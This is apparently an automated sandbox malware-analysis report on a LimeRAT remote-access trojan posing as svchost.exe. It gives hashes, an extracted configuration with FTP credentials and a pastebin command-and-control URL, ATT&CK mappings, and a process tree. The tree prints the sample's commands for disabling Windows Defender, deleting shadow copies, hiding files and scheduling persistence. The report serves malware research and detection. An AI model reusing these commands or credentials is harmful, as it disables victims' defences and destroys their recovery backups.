Overview

overview

10

Static

static

10

svchost.exe

windows10-1703-x64

10

svchost.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    194s
  • max time network
    196s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-06-2024 22:02

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    svchost.exe

  • Size

    242KB

  • MD5

    05e991bcf019b487f7ad4e896c77e988

  • SHA1

    f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a

  • SHA256

    cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196

  • SHA512

    4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

  • SSDEEP

    6144:GpCE/UVPy/oCa+LDZWC9z5B0bmknq1difFN:6CzPygCa+DZ+nq1cT

Score
10/10
limeratdefense_evasionevasionexecutionimpactransomwarerattrojan

Malware Config

Extracted

Credentials

  • Protocol:     ftp
  • Host:
    ftp.encompossoftware.com
  • Port:
    21
  • Username:
    remoteuser
  • Password:
    Encomposx99

Extracted

Family

limerat

Wallets

False

Attributes
  • aes_key

    1

  • antivm

    false

  • c2_url

    https://pastebin.com/raw/GfV4LBjE

  • download_payload

    true

  • install

    true

  • install_name

    svchost.exe

  • main_folder

    False

  • payload_url

    True

  • pin_spread

    true

  • sub_folder

    False

  • usb_spread

    false

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

    ratlimerat
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs
    evasiontrojan
  • Modifies security service 2 TTPs 1 IoCs
    evasion
  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
    evasion
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
    evasion
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomwaredefense_evasionimpactexecution
  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 15 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 2 IoCs
    defense_evasion
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Disables Windows logging functionality 2 TTPs

    Changes registry settings to disable Windows Event logging.

  • Interacts with shadow copies 3 TTPs 12 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 4 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Modifies security service
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2324
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4228
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
        3⤵
        • Views/modifies file attributes
        PID:3852
      • C:\Windows\system32\attrib.exe
        attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
        3⤵
        • Views/modifies file attributes
        PID:4672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2396
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:768
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5100
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4036
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3856
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c vssadmin Delete Shadows /all /quiet
      2⤵
        PID:1876
        • C:\Windows\system32\vssadmin.exe
          vssadmin Delete Shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:4696
      • C:\Windows\SYSTEM32\cmd.exe
        cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
        2⤵
          PID:4164
          • C:\Windows\system32\vssadmin.exe
            vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
            3⤵
              PID:4472
          • C:\Windows\SYSTEM32\cmd.exe
            cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
            2⤵
              PID:3216
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                3⤵
                • Interacts with shadow copies
                PID:2912
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:3440
              • C:\Windows\system32\vssadmin.exe
                vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                3⤵
                • Enumerates connected drives
                • Interacts with shadow copies
                PID:4132
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
              2⤵
                PID:2896
                • C:\Windows\system32\vssadmin.exe
                  vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
                  3⤵
                  • Enumerates connected drives
                  • Interacts with shadow copies
                  PID:1248
              • C:\Windows\SYSTEM32\cmd.exe
                cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                2⤵
                  PID:1580
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                    3⤵
                    • Enumerates connected drives
                    • Interacts with shadow copies
                    PID:4936
                • C:\Windows\SYSTEM32\cmd.exe
                  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
                  2⤵
                    PID:3044
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
                      3⤵
                      • Enumerates connected drives
                      • Interacts with shadow copies
                      PID:4984
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4576
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                      3⤵
                      • Enumerates connected drives
                      • Interacts with shadow copies
                      PID:1396
                  • C:\Windows\SYSTEM32\cmd.exe
                    cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
                    2⤵
                      PID:2056
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
                        3⤵
                        • Enumerates connected drives
                        • Interacts with shadow copies
                        PID:4528
                    • C:\Windows\SYSTEM32\cmd.exe
                      cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                      2⤵
                        PID:2988
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:4432
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1988
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
                          3⤵
                          • Enumerates connected drives
                          • Interacts with shadow copies
                          PID:4972
                      • C:\Windows\SYSTEM32\cmd.exe
                        cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                        2⤵
                          PID:1956
                          • C:\Windows\system32\vssadmin.exe
                            vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                            3⤵
                            • Enumerates connected drives
                            • Interacts with shadow copies
                            PID:4248
                        • C:\Windows\SYSTEM32\cmd.exe
                          cmd /c Vssadmin delete shadowstorage /all /quiet
                          2⤵
                            PID:2404
                            • C:\Windows\system32\vssadmin.exe
                              Vssadmin delete shadowstorage /all /quiet
                              3⤵
                              • Interacts with shadow copies
                              PID:1308
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "06:49" /sc daily /mo "5" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:6128
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "01:25" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5220
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "07:56" /sc daily /mo "3" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5176
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "23:09" /sc weekly /mo "4" /d "Mon" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:5424
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /create /f /st "08:19" /sc monthly /m " jul" /tn "EnableLicenseAcquisition" /tr "'explorer'https://gsurl.be/kXFY"
                            2⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:4536
                          • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
                            "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
                            2⤵
                            • Modifies visibility of file extensions in Explorer
                            • Modifies visiblity of hidden/system files in Explorer
                            • Executes dropped EXE
                            • Suspicious behavior: EnumeratesProcesses
                            • System policy modification
                            PID:2968
                            • C:\Windows\SYSTEM32\cmd.exe
                              cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
                              3⤵
                              • Hide Artifacts: Hidden Files and Directories
                              PID:4112
                              • C:\Windows\system32\attrib.exe
                                attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
                                4⤵
                                • Views/modifies file attributes
                                PID:5956
                              • C:\Windows\system32\attrib.exe
                                attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
                                4⤵
                                • Views/modifies file attributes
                                PID:1980
                        • C:\Windows\system32\vssvc.exe
                          C:\Windows\system32\vssvc.exe
                          1⤵
                            PID:5492
                          • C:\Windows\system32\taskmgr.exe
                            "C:\Windows\system32\taskmgr.exe" /4
                            1⤵
                            • Drops file in Windows directory
                            • Checks SCSI registry key(s)
                            • Checks processor information in registry
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:3560

                          Network

                          MITRE ATT&CK Enterprise v15

                          Reconnaissance

                          Resource Development

                          Initial Access

                          Execution

                          Scheduled Task/Job

                          1
                          T1053

                          Scheduled Task

                          1
                          T1053.005

                          Windows Management Instrumentation

                          1
                          T1047

                          Persistence

                          Create or Modify System Process

                          2
                          T1543

                          Windows Service

                          2
                          T1543.003

                          Scheduled Task/Job

                          1
                          T1053

                          Scheduled Task

                          1
                          T1053.005

                          Privilege Escalation

                          Create or Modify System Process

                          2
                          T1543

                          Windows Service

                          2
                          T1543.003

                          Scheduled Task/Job

                          1
                          T1053

                          Scheduled Task

                          1
                          T1053.005

                          Defense Evasion

                          Direct Volume Access

                          1
                          T1006

                          Hide Artifacts

                          4
                          T1564

                          Hidden Files and Directories

                          4
                          T1564.001

                          Impair Defenses

                          2
                          T1562

                          Disable or Modify Tools

                          2
                          T1562.001

                          Indicator Removal

                          2
                          T1070

                          File Deletion

                          2
                          T1070.004

                          Modify Registry

                          6
                          T1112

                          Credential Access

                          Discovery

                          Peripheral Device Discovery

                          2
                          T1120

                          Query Registry

                          4
                          T1012

                          System Information Discovery

                          4
                          T1082

                          Lateral Movement

                          Collection

                          Command and Control

                          Web Service

                          1
                          T1102

                          Exfiltration

                          Impact

                          Inhibit System Recovery

                          2
                          T1490

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                            Filesize

                            3KB

                            MD5

                            ad5cd538ca58cb28ede39c108acb5785

                            SHA1

                            1ae910026f3dbe90ed025e9e96ead2b5399be877

                            SHA256

                            c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

                            SHA512

                            c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost.exe.log
                            Filesize

                            1KB

                            MD5

                            a9d9426944d7ee7cff4018213e207474

                            SHA1

                            e6a45f343e5181a5d44eccd5abd0a5e0d559ee29

                            SHA256

                            9d1fd0305bd35ac934cbcbfb7ded29505a255f77306994676d0b994e51dcdacb

                            SHA512

                            f3c4e6993baa914ef7fd0d93d8a4d82cf4b63df807634f810fd307d77341ffde80b0671c20fa0f84107aaf1ee00634488b877e200fcc1e66317bc05c9bc077a2

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            326682587fa2a91cdce1a23343365924

                            SHA1

                            f3f9c4c753185c9ad8e65bbf3d3c027082b4ed5c

                            SHA256

                            c26a1262354d3eb74dc6da10db49ddcada09cf606f90f1ece7dba3332d090e20

                            SHA512

                            c6835c9e8de2676b92583cb7e96d3b64680f3e810d2b6dd7ce240b8c16c7c1060fd37a31df9f0afb8eed95dc7395a8c474f522407b77fd40aa15956b694c9f4c

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            c176893209cde8007a0f5725480f95a2

                            SHA1

                            8c2af7640abb79e5f29af46f7ff5b57cb99a9d24

                            SHA256

                            36d94401b3d02935ed756b287003dbeb246dd6de6bb5f7075dbb2719f78efe6a

                            SHA512

                            5dfcd2f66add6fd2da9af9d2d2b91c1288d5428afc26d59405f930cbacf90c2a30ae68b9fe30237cf1b337903b911916cab7c2815437931c0b39061bc1192049

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            4be28fdfb37a676b93fad78b99d81211

                            SHA1

                            332072f199bce181ba74730b7d4d1072d2b0af19

                            SHA256

                            9e66684d79d4992d4fe387a5e3970545182a0ca52ecbf1b69cfbb537f5cedfa6

                            SHA512

                            69284ab872572813ff614b3c1fcf8738f14453b20066d91ed48b3051a406272031c2f5f6d70684480af746b07e7df1e113569ff21a17993bd9c577c2868198a3

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            1251c52bf27855e59b1a121961ca2ab6

                            SHA1

                            9398fba66b322fd3ca99d6ad9476a06a46f92c41

                            SHA256

                            23f9fc9342bf8c5f567439b05b22533c15b8839e12612ecf782b42ad2b8f1c70

                            SHA512

                            cdd3a8fcd712893205efe86e7a30be64d37d7e04923a3a6042d87f4b0251a913bd77cdd7a729aaeece3050a7e7e88e275bb206f317cfabf02ad6409077016e63

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            42f854a16123a7207968a3690f6a3db7

                            SHA1

                            9bf2f4a63aeff9365f5a69cee28dfe769fd19bb4

                            SHA256

                            cdf414ceb304061e82bf6e0d70807a99307bc102851399e253850c0104b31e69

                            SHA512

                            558d194a5669a5df8f4ac6aadb36047c800ff773c4aa8bda107e268d4b58e261a703ad2a55e18acc8ba01de3391bd626b42fe794494aeb4ce03023f0a98d1bf4

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            19c0976b6fb0de0eaa9c9e7b473064e1

                            SHA1

                            396be14e8cee53e7a631fc6dcda3aa2ec9b1b281

                            SHA256

                            b7ae4d869a394726856b59f24f2df0e643f9e0675ed89266ca9f881f1e21e17c

                            SHA512

                            889a95789d27cdb3bb706f54e7d19380e331fbaf2816f7d337a47b59017f63eabef515209993ffcfd199dd4d3c7221a24d67dd52da776a8bd542715c73c9e0c4

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            2067ae57626e36223689ffecaba3b327

                            SHA1

                            0b2324ac98f9ede4932e3f8f560e03d4d1a1c8d7

                            SHA256

                            df7b47c1b102b6b5b0d020c46f45da8e9c595e9032d7d1cb4afd8bd7f61f4b19

                            SHA512

                            02f4894da5136eb13a18928d0502b9a98e3f2d7fc08434c302695d68da0a091c4b33d54ea4b091623ab5868bcfb9a5c5254ec3bade50bb445ac4e09fc7ad5a00

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            e41c231d56e1281192f5209de73222c5

                            SHA1

                            59f24fafe8d7555a53a42cfab048477153148eb5

                            SHA256

                            27da3e64fae9b82755a2c2f147bc5c25803540c8d744acf6e4ea45f315305da8

                            SHA512

                            2d37ef379bc0651ab65ac10a65da7805f26657f66e700ea569c59d583c6c5a55f9cc09b4f763e8d3cc288cd4ec2ce42ea12ccc7cbeb01cf64ad5cb87eb846a9f

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            80bd89f3610176124e7363c4f0729015

                            SHA1

                            9b045d173660cf2ffff206eed7e6acc69e4b8357

                            SHA256

                            73b6ab0315f2dae879f62688b02aa4f76794f57bfb431e4f833fff4cf89264e6

                            SHA512

                            0db85b745f6c23c9432053f8a0833994df0b44bda3a1721667caeb817bceccfaf4692eed9272ad69aaa2d4de12400aef3de98eb4bcf0d462e20f5868b22d39ac

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Filesize

                            1KB

                            MD5

                            f775aa93e7cb45bcdb8003aac41437d3

                            SHA1

                            1bb3c21d107d0f5902315f83616e94931620309c

                            SHA256

                            3abbe7cf798db495b11bcbabd8242a234bbf278cb46d44344d03352c85f3e34b

                            SHA512

                            1f2b388e1fa2accb9cb033803b45ddee21ab1cdf5198d05721b9916bc885af1feed59b7f9062860644388df99cbcc82d092a1f6efeb7534b309fb7639238e226

                            Download Submit

                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c04c0cci.e4n.ps1
                            Filesize

                            1B

                            MD5

                            c4ca4238a0b923820dcc509a6f75849b

                            SHA1

                            356a192b7913b04c54574d18c28d46e6395428ab

                            SHA256

                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                            SHA512

                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                            Download Submit

                          • C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
                            Filesize

                            242KB

                            MD5

                            05e991bcf019b487f7ad4e896c77e988

                            SHA1

                            f4a93e4ce16dba10cdc835fe1ae71da3dd88f73a

                            SHA256

                            cb87011623c7e41c0a449814e76c887543e6e39e6ab3864c7cc3636dcf09e196

                            SHA512

                            4f4ee0153af79dbb6352b1382cbee3b5af72c64f827450d2a681fd2b3177304ac1c6626c055159facb84aca9f8ba6aa9d1265d5fb148080e566903949081cfb3

                            Download Submit

                          • memory/2324-566-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2324-1-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2324-544-0x00007FFF7A123000-0x00007FFF7A124000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/2324-559-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2324-2-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/2324-0-0x0000021B31B70000-0x0000021B31BB2000-memory.dmp

                            Filesize

                            264KB

                            Download

                          • memory/2968-575-0x0000021172130000-0x0000021172656000-memory.dmp

                            Filesize

                            5.1MB

                            Download

                          • memory/2968-574-0x00000211566B0000-0x00000211566CE000-memory.dmp

                            Filesize

                            120KB

                            Download

                          • memory/5016-9-0x000001C2D4DB0000-0x000001C2D4DD2000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/5016-7-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/5016-8-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/5016-11-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/5016-51-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download

                          • memory/5016-14-0x000001C2D59C0000-0x000001C2D5A36000-memory.dmp

                            Filesize

                            472KB

                            Download

                          • memory/5016-43-0x00007FFF7A120000-0x00007FFF7AB0C000-memory.dmp

                            Filesize

                            9.9MB

                            Download